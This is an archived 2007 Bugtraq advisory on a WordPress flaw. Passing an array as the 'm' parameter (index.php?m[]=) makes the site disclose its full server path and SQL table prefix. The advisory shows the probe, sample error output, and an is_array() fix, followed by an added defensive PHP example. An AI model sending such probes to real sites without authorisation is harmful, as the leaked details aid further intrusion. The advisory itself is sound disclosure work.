Message-ID: <20070112013247.15767.qmail@securityfocus.com>
Date: 12 Jan 2007 01:32:47 -0000
From: process@...ct.org
To: bugtraq@...urityfocus.com
Subject: Wordpress disclosure of Table Prefix Weakness

Wordpress Full Path disclosure and disclosure of Table Prefix Weakness

Description:

Affected system:
WordPress 2.1Alpha 3(SVN:4662)
WordPress =>2.0.6

xy7 has discovered a weakness in WordPress, which can be exploited by malicious people to disclose SQL information and the WordPress full path.

The problem is that SQL error messages are returned to the user. This can be exploited to disclose the configured table prefix via an invalid "m" parameter passed in index.php.

Example:
http://[host]/index.php?m[]=


You will see return information like this:
Warning: rawurlencode() expects parameter 1 to be string, array given in [path]\wp-includes\classes.php on line 227

WordPress 数据库错误: [Unknown column 'Arra' in 'where clause']
SELECT SQL_CALC_FOUND_ROWS wp_posts.* FROM wp_posts WHERE 1=1 AND YEAR(post_date)=Arra AND (post_type = 'post' AND (post_status = 'publish' OR post_status = 'private')) ORDER BY post_date DESC LIMIT 0, 10


Solution:
Edit the source to check the variable "$m" with the is_array() function.

Provided and/or discovered by:
Xy7 of Bug.Center.Team found the vulnerability 
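
The is_array() check from the Solution above, sketched as an added example; this is not WordPress source code and not part of the original advisory. The function names and the accepted formats for "m" (YYYY, YYYYMM or YYYYMMDD) are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not taken from WordPress.

// Return a validated archive date string for the "m" query variable, or null.
function normalize_m_param($raw): ?string
{
    // m[]= makes PHP deliver an array. Refuse it here, before it can be cast
    // to the string "Array" (seen truncated to "Arra" in the error above)
    // and spliced into the query.
    if (is_array($raw) || !is_scalar($raw)) {
        return null;
    }
    $value = (string) $raw;
    // Assumed format: digits only, as YYYY, YYYYMM or YYYYMMDD.
    if (!preg_match('/^\d{4}(\d{2}(\d{2})?)?$/', $value)) {
        return null;
    }
    return $value;
}

// Build the date part of the WHERE clause; an empty string means "no filter".
function year_clause($raw): string
{
    $m = normalize_m_param($raw);
    if ($m === null) {
        return '';
    }
    // The integer cast guarantees only a number ever reaches the SQL text.
    return ' AND YEAR(post_date)=' . (int) substr($m, 0, 4);
}

// Constructed query strings, parsed the same way PHP fills $_GET.
foreach (['m[]=', 'm=200701', 'm=2007', "m=2007'"] as $query) {
    parse_str($query, $get);
    printf("%-10s => \"%s\"\n", $query, year_clause($get['m'] ?? null));
}
```

With the array and malformed inputs mapped to "no filter", the query never contains an unknown column, so no SQL error text (and no table prefix) is produced for the response.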
